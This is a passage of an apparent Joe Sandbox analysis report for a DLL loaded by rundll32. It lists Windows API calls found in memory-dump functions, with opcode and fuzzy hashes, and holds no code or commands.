                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 251f625c4975542e9150ef2aa80ec7609923eab4ab19a28241fce101d707fcc8
                                                                              • Instruction ID: 564327e394960e201c9b530e7e45afedf2a2845a73fd0f227892aed5f8809e94
                                                                              • Opcode Fuzzy Hash: 251f625c4975542e9150ef2aa80ec7609923eab4ab19a28241fce101d707fcc8
                                                                              • Instruction Fuzzy Hash: 0DE04FE3B105242AF760A9ED9CC1F6B914DCB916BAF0A0635FB51EB2C0D559EC0182E8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(04630000,?,0000020A), ref: 0463C4B6
                                                                                • Part of subcall function 0463D70C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0463D7C6,?,04630000,04858C1C), ref: 0463D748
                                                                                • Part of subcall function 0463D70C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0463D7C6,?,04630000,04858C1C), ref: 0463D799
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleName$LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 4113206344-0
                                                                              • Opcode ID: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
                                                                              • Instruction ID: 989ffcfb0bb56b08acc8eaef6e08d21419a749952b09db26feaec72953a257e2
                                                                              • Opcode Fuzzy Hash: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
                                                                              • Instruction Fuzzy Hash: BAE0ED72A003509BDB10DE58D8C4A5737E4AF08655F044595FD14DF34BF371E91087D1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,0484AD80,00000000,0484ADE0), ref: 04655811
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectory
                                                                              • String ID:
                                                                              • API String ID: 4241100979-0
                                                                              • Opcode ID: d8d0ff34f32125d42050a8512575aac9235832b3353a8fe2d85864a225ec7fcb
                                                                              • Instruction ID: 63d7bfbc5c1860137f6ee541168bac25c2796b9b79ad2dbf5013b00706b389f3
                                                                              • Opcode Fuzzy Hash: d8d0ff34f32125d42050a8512575aac9235832b3353a8fe2d85864a225ec7fcb
                                                                              • Instruction Fuzzy Hash: 30B092927502802AFF0035F91CC1B2E008C9B5440EF100939F151C6281F86BD8451014
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 04639D83
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: AllocString
                                                                              • String ID:
                                                                              • API String ID: 2525500382-0
                                                                              • Opcode ID: dd0b7af6829fdb8ea53ff36f0f1c6947d542e7e52d8e55ddb7a24222a2ffb2fc
                                                                              • Instruction ID: d7e50b0dedc0805b0284579be2bdb447d230788bb6f5b11f347ef10d58d43a51
                                                                              • Opcode Fuzzy Hash: dd0b7af6829fdb8ea53ff36f0f1c6947d542e7e52d8e55ddb7a24222a2ffb2fc
                                                                              • Instruction Fuzzy Hash: D8B012E4708BC230FA2064319D02736004D0B21743FC4011A6C27C11C0FA81F0099879
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: InfoSystem
                                                                              • String ID:
                                                                              • API String ID: 31276548-0
                                                                              • Opcode ID: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
                                                                              • Instruction ID: 1b3ea24b5179ded1c31d2853cfcaee1492389d48cf83ff61bbe7eaa92c62ef24
                                                                              • Opcode Fuzzy Hash: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
                                                                              • Instruction Fuzzy Hash: CCA012144085001AC444E7186C4240F31801941015FC40714685DA6281F605D56403DB
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,04635C63), ref: 04635663
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 0358b9d3f298cceea8c612dc583beb11e1318f24492ac52ba1a6f327c4d85c93
                                                                              • Instruction ID: 85cdf13314dfd4dcd749b399205de07bb15a7a4717362d8f8bd63f6a1c304600
                                                                              • Opcode Fuzzy Hash: 0358b9d3f298cceea8c612dc583beb11e1318f24492ac52ba1a6f327c4d85c93
                                                                              • Instruction Fuzzy Hash: 30F0AFF2B013019FE7549F78AA487467BD5E704396F10463EE90ADB789E7B49C418784
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 046357A7
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 046357CA
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 046357D7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$Free$Query
                                                                              • String ID:
                                                                              • API String ID: 778034434-0
                                                                              • Opcode ID: a51fbdc1f41f3635193ee000f3d4045f8b36ea77ddc743b9d4aec4bd80984ab7
                                                                              • Instruction ID: 9263d707a69a92d0ae5b0dd60b034c2f648352e5a8be95e8ad8969662c636b93
                                                                              • Opcode Fuzzy Hash: a51fbdc1f41f3635193ee000f3d4045f8b36ea77ddc743b9d4aec4bd80984ab7
                                                                              • Instruction Fuzzy Hash: 71F0AF34705640AFD311DB29C884B1BB7F5EFC9251F15C668E9898B3A0E731EC028B96
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 0463CE35
                                                                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0463CE46
                                                                              • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?), ref: 0463CF46
                                                                              • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 0463CF58
                                                                              • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?), ref: 0463CF64
                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?), ref: 0463CFA9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                              • String ID: GetLongPathNameW$\$kernel32.dll
                                                                              • API String ID: 1930782624-3908791685
                                                                              • Opcode ID: fb585dabb97f9fddcca49dd36e54efbc2bb4c052337462b2d0225d09279cc242
                                                                              • Instruction ID: bc6302d9eedcf80c6d4f5ddbe0a42994c02bbccb3b7031624d2f64d6a8776571
                                                                              • Opcode Fuzzy Hash: fb585dabb97f9fddcca49dd36e54efbc2bb4c052337462b2d0225d09279cc242
                                                                              • Instruction Fuzzy Hash: 70419E33E006989BDB10DEA8CC84ADEB3B5AF44316F1485A9F505B3240FB74BE41DA85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0480AD02
                                                                              • IsIconic.USER32(?), ref: 0480AD30
                                                                              • IsWindowVisible.USER32(?), ref: 0480AD40
                                                                              • ShowWindow.USER32(?,00000000,00000000,?,?,?,04818063,?,048671C0), ref: 0480AD5D
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0480AD70
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0480AD81
                                                                              • ShowWindow.USER32(?,00000006,00000000,?,?,?,04818063,?,048671C0), ref: 0480ADA1
                                                                              • ShowWindow.USER32(?,00000005,00000000,?,?,?,04818063,?,048671C0), ref: 0480ADAB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$LongShow$IconicVisible
                                                                              • String ID:
                                                                              • API String ID: 3484284227-0
                                                                              • Opcode ID: e2d2d2bda7e48cdee300b696ed73125804b916b6193880a82d11273c920ab12f
                                                                              • Instruction ID: 2fe15c646f22276aafb7d0fe8fca794d39f7fedd5bfb6d095f4271182e9facb4
                                                                              • Opcode Fuzzy Hash: e2d2d2bda7e48cdee300b696ed73125804b916b6193880a82d11273c920ab12f
                                                                              • Instruction Fuzzy Hash: 40112B4266E79039EB2632291C00FEF39D84FE3326F18CF2DF9C5D11C1E658A145826B
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetLogicalDriveStringsW.KERNEL32(00000104,?,00000000,04652E4A,?,00000000,?,00000000,?,04653151,00000001,00000000,00000002,00000000,00000001,00000000), ref: 04652D59
                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000104,00000104,?,00000000,04652E4A,?,00000000,?,00000000,?,04653151,00000001,00000000,00000002), ref: 04652D83
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: DeviceDriveLogicalQueryStrings
                                                                              • String ID:
                                                                              • API String ID: 3173366581-0
                                                                              • Opcode ID: bf7dda7c3cc92f7087c1eecf5b5b54f7e1c04be3aa7f2f3df12306b651a8f5f9
                                                                              • Instruction ID: 120347eb88c0efcd197b013980e51113a6d61cdebf4c2ba119fa7bf64deb1749
                                                                              • Opcode Fuzzy Hash: bf7dda7c3cc92f7087c1eecf5b5b54f7e1c04be3aa7f2f3df12306b651a8f5f9
                                                                              • Instruction Fuzzy Hash: C63150B1A002189BEB25DF64C891A9DB3F9EF48714F5141EAE905A7350FB30FE448F98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(PSAPI.dll,00000000,04646631,00000000,?,00000000,?,0465309E,00000104,00000000,046530F2,?,000003EE,00000004,00000000,00000000), ref: 04646158
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: EmptyWorkingSet$EnumDeviceDrivers$EnumProcessModules$EnumProcesses$GetDeviceDriverBaseNameA$GetDeviceDriverBaseNameW$GetDeviceDriverFileNameA$GetDeviceDriverFileNameW$GetMappedFileNameA$GetMappedFileNameW$GetModuleBaseNameA$GetModuleBaseNameW$GetModuleFileNameExA$GetModuleFileNameExW$GetModuleInformation$GetProcessMemoryInfo$InitializeProcessForWsWatch$PSAPI.dll$QueryWorkingSet
                                                                              • API String ID: 1029625771-2267155864
                                                                              • Opcode ID: 6ac8aa50136cf0b09242b700a151b7ddf0239615d3b5adc0797d37234f00b152
                                                                              • Instruction ID: 65be5b998383783f264fe8a206f4ce32d7976d16cfbaa7465fe73577a3ffbf43
                                                                              • Opcode Fuzzy Hash: 6ac8aa50136cf0b09242b700a151b7ddf0239615d3b5adc0797d37234f00b152
                                                                              • Instruction Fuzzy Hash: 354130B0A41760DFFF40DFB4F986E1A37A9EB97A087405965E410CF204FA78E9418F99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 04638739
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0463873F
                                                                              • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 04638752
                                                                              • GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 0463875B
                                                                              • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,046387D2,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 04638786
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                                                                              • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                              • API String ID: 1184211438-79381301
                                                                              • Opcode ID: 460ad1bd45dd97aa2ceb0f826e45d00e7e6ea1f4f8d1e740aec50b8678b0b746
                                                                              • Instruction ID: bbd9d61d187992843cdaa453ed8d7aef624aeabca02b1e949b12e9b033fbf04e
                                                                              • Opcode Fuzzy Hash: 460ad1bd45dd97aa2ceb0f826e45d00e7e6ea1f4f8d1e740aec50b8678b0b746
                                                                              • Instruction Fuzzy Hash: D4116D70D00288BFEB10EBA6C844AADB7F6EF4030AF108499E80493640F778BA848B55
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 046658A5
                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 046658C1
                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 046658FA
                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 04665977
                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 04665990
                                                                              • VariantCopy.OLEAUT32(?), ref: 046659C5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                              • String ID:
                                                                              • API String ID: 351091851-3916222277
                                                                              • Opcode ID: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                                                                              • Instruction ID: 5ff0b21a75389cd73979faa8a076801aa975c8ab1034e53edcf5a80fb36122ee
                                                                              • Opcode Fuzzy Hash: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                                                                              • Instruction Fuzzy Hash: 9D510B75900229AFDB22DF58DD80BD9B7FCAF49214F0041D9E50AA7301EA70BF858F69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetCapture.USER32 ref: 04817AC6
                                                                              • IsWindowUnicode.USER32(00000000), ref: 04817B09
                                                                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 04817B24
                                                                              • SendMessageA.USER32(00000000,-0000BBEE,?,?), ref: 04817B43
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 04817B52
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 04817B63
                                                                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 04817B83
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                              • String ID:
                                                                              • API String ID: 1994056952-0
                                                                              • Opcode ID: 243006645f015927a6f88d55e7a800f3bc45409d855799a06a269baad8e71de6
                                                                              • Instruction ID: 08d7de95b51012cbb895e2d9997f3e17c59116b7595f6ab72233d4ecae35ff25
                                                                              • Opcode Fuzzy Hash: 243006645f015927a6f88d55e7a800f3bc45409d855799a06a269baad8e71de6
                                                                              • Instruction Fuzzy Hash: D6217C75204608AFBB60FA98CD40F6B73DCDF48264B144E2EEA5AC7261EB20F8408764
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 73e32524d3a122b234ad06882df88c1dad3ba5c38c7a396de6c544977fed9838
                                                                              • Instruction ID: a2102e56326476b24f25deaf80f2ce6e74ad040cd4a9d8612f0eae8e89a59c45
                                                                              • Opcode Fuzzy Hash: 73e32524d3a122b234ad06882df88c1dad3ba5c38c7a396de6c544977fed9838
                                                                              • Instruction Fuzzy Hash: ACC125627102C06BE7249A7CDC8476EB2C69BC432BF18867DE216CB3C6FB64EC458754
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 04638E38: GetCurrentThreadId.KERNEL32 ref: 04638E3B
                                                                              • GetTickCount.KERNEL32 ref: 046389E3
                                                                              • GetTickCount.KERNEL32 ref: 046389FB
                                                                              • GetCurrentThreadId.KERNEL32 ref: 04638A2A
                                                                              • GetTickCount.KERNEL32 ref: 04638A55
                                                                              • GetTickCount.KERNEL32 ref: 04638A8C
                                                                              • GetTickCount.KERNEL32 ref: 04638AB6
                                                                              • GetCurrentThreadId.KERNEL32 ref: 04638B26
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CountTick$CurrentThread
                                                                              • String ID:
                                                                              • API String ID: 3968769311-0
                                                                              • Opcode ID: 5c08a82f879b74723aa517f04222c622cd0f95d3aea439a1b2a319428d24e3c0
                                                                              • Instruction ID: 7fab531a0e54ca71d7f86f1c1dc210afb3f41e532e803b2e82e82332c5f24f90
                                                                              • Opcode Fuzzy Hash: 5c08a82f879b74723aa517f04222c622cd0f95d3aea439a1b2a319428d24e3c0
                                                                              • Instruction Fuzzy Hash: 19417F712083C19EE721FE7CC98439ABBD1AFA0356F14896CE4D987381FB75A8858752
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,04857788,00000000,?,04639AEA,?,?,04863B9C,04863B9C,?,?,04858C38,04640843,04857788), ref: 04639A65
                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,04857788,00000000,?,04639AEA,?,?,04863B9C,04863B9C,?,?,04858C38,04640843), ref: 04639A6B
                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,00000002,04857788,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,04857788,00000000,?,04639AEA,?,?,04863B9C), ref: 04639A86
                                                                              • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,04857788,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,04857788,00000000,?,04639AEA,?,?), ref: 04639A8C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Similarity
                                                                              • API ID: FileHandleWrite
                                                                              • String ID: Error$Runtime error at 00000000
                                                                              • API String ID: 3320372497-2970929446
                                                                              • Opcode ID: bbc495b04e9e24900b2c10b889da7d666f44045dcba19d61430c5e4dc5c18eac
                                                                              • Instruction ID: 3445cfc13b97c85248122829c6efc9afeac9a8a03e8561c3e6cb7a179da66f27
                                                                              • Opcode Fuzzy Hash: bbc495b04e9e24900b2c10b889da7d666f44045dcba19d61430c5e4dc5c18eac
                                                                              • Instruction Fuzzy Hash: 37F0F6906803C0B9FB21BB588D4AF59365C9B00B17F501B0AF165DA5C1F7ED78889A76
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetFileSize.KERNEL32(00000001,00000000,00000000,04653181,?,?,?,0465323B,00000000,04653255,?,00000000,80000000,00000001,00000000,00000003), ref: 04652FA1
                                                                              • CreateFileMappingW.KERNEL32(00000001,00000000,00000002,00000000,00000001,00000000,00000001,00000000,00000000,04653181,?,?,?,0465323B,00000000,04653255), ref: 04653037
                                                                              • MapViewOfFile.KERNEL32(000003EE,00000004,00000000,00000000,00000001,00000000,04653110,?,00000001,00000000,00000002,00000000,00000001,00000000,00000001,00000000), ref: 04653066
                                                                              • GetCurrentProcess.KERNEL32(00000104,00000000,046530F2,?,000003EE,00000004,00000000,00000000,00000001,00000000,04653110,?,00000001,00000000,00000002,00000000), ref: 0465308B
                                                                              • UnmapViewOfFile.KERNEL32(00000000,046530F9,?,000003EE,00000004,00000000,00000000,00000001,00000000,04653110,?,00000001,00000000,00000002,00000000,00000001), ref: 046530EC
                                                                                • Part of subcall function 04652D1C: GetLogicalDriveStringsW.KERNEL32(00000104,?,00000000,04652E4A,?,00000000,?,00000000,?,04653151,00000001,00000000,00000002,00000000,00000001,00000000), ref: 04652D59
                                                                                • Part of subcall function 04652D1C: QueryDosDeviceW.KERNEL32(?,?,00000104,00000104,?,00000000,04652E4A,?,00000000,?,00000000,?,04653151,00000001,00000000,00000002), ref: 04652D83
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Similarity
                                                                              • API ID: File$View$CreateCurrentDeviceDriveLogicalMappingProcessQuerySizeStringsUnmap
                                                                              • String ID:
                                                                              • API String ID: 435433801-0
                                                                              • Opcode ID: a790490ffd5c94e92b36087b063c8ba41910fe1ceb4b695b8e507a2c73470d7c
                                                                              • Instruction ID: 39b2ca5bb3a0fca8fd2f42a2fa9c901fadaf41098d993cc5b892d585a6cb3f1d
                                                                              • Opcode Fuzzy Hash: a790490ffd5c94e92b36087b063c8ba41910fe1ceb4b695b8e507a2c73470d7c
                                                                              • Instruction Fuzzy Hash: D3514C70A00249AFEF20EFA4CC95B9EB7B5EB49704F5045A9E904A73A0E7747E81CF54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 04636252
                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 04636258
                                                                              • GetStdHandle.KERNEL32(000000F4,046353A0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 04636277
                                                                              • WriteFile.KERNEL32(00000000,000000F4,046353A0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 0463627D
                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,046353A0,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 04636294
                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,046353A0,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 0463629A
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleWrite
                                                                              • String ID:
                                                                              • API String ID: 3320372497-0
                                                                              • Opcode ID: 1982b620de516ca273794dd5a79f432c5a9532d34dcb7ef12641a9bbdb6cedc9
                                                                              • Instruction ID: cc3aa478d9dd5eafdfc794d9a6b513ff0f0865f5ab24620e37f9cf9d6876b031
                                                                              • Opcode Fuzzy Hash: 1982b620de516ca273794dd5a79f432c5a9532d34dcb7ef12641a9bbdb6cedc9
                                                                              • Instruction Fuzzy Hash: 4501C8A13083903DF510F7B8DD84F5B26CCCF1562EF100619B169D71D0EAA9AC0497B9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • EnumWindows.USER32(04816848,00000000), ref: 04816992
                                                                              • ShowWindow.USER32(?,00000000,04816848,00000000), ref: 048169D4
                                                                              • ShowOwnedPopups.USER32(00000000,?), ref: 04816A03
                                                                              • ShowWindow.USER32(?,00000005), ref: 04816A78
                                                                              • ShowOwnedPopups.USER32(00000000,?), ref: 04816AA7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Show$OwnedPopupsWindow$EnumWindows
                                                                              • String ID:
                                                                              • API String ID: 315437064-0
                                                                              • Opcode ID: 05fbb80ca3e0bcdddf95cb5d9a144afbbb29c207009b10c4bd0efef7d354ae0b
                                                                              • Instruction ID: d02d2addbfb4582ddc9a4f3c01a73f3ac9760c9d3f6c5d883e97953c16b3de0d
                                                                              • Opcode Fuzzy Hash: 05fbb80ca3e0bcdddf95cb5d9a144afbbb29c207009b10c4bd0efef7d354ae0b
                                                                              • Instruction Fuzzy Hash: 39413C30600B019FE721DA2CC484B6A73DAFB84319F054E2BE595D72A1E734B8D5DB42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • UnhookWindowsHookEx.USER32(00000000), ref: 04815A5A
                                                                              • SetEvent.KERNEL32(00000000), ref: 04815A86
                                                                              • GetCurrentThreadId.KERNEL32 ref: 04815A8B
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 04815AB4
                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 04815AC1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                              • String ID:
                                                                              • API String ID: 2132507429-0
                                                                              • Opcode ID: bf89cb67a653355633545a988dee1374e8a7636e2df79451d409c1cef8d63c48
                                                                              • Instruction ID: 6f829d9be273a481dec0f16af469a76a62afc4a343f52b19a714d5256f6d6e4d
                                                                              • Opcode Fuzzy Hash: bf89cb67a653355633545a988dee1374e8a7636e2df79451d409c1cef8d63c48
                                                                              • Instruction Fuzzy Hash: 05016270155200EFEB40EB68D981B1933E8EBC4318F405E2BF555C71D0EA78B880CF96
                                                                              Uniqueness

